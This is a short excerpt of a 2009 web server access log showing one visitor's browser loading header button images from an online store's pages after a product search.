221.251.28.84 - - [13/May/2009:00:48:36 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):454-21302" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [13/May/2009:00:48:36 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):454-21302" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [13/May/2009:00:48:36 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):454-21302" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
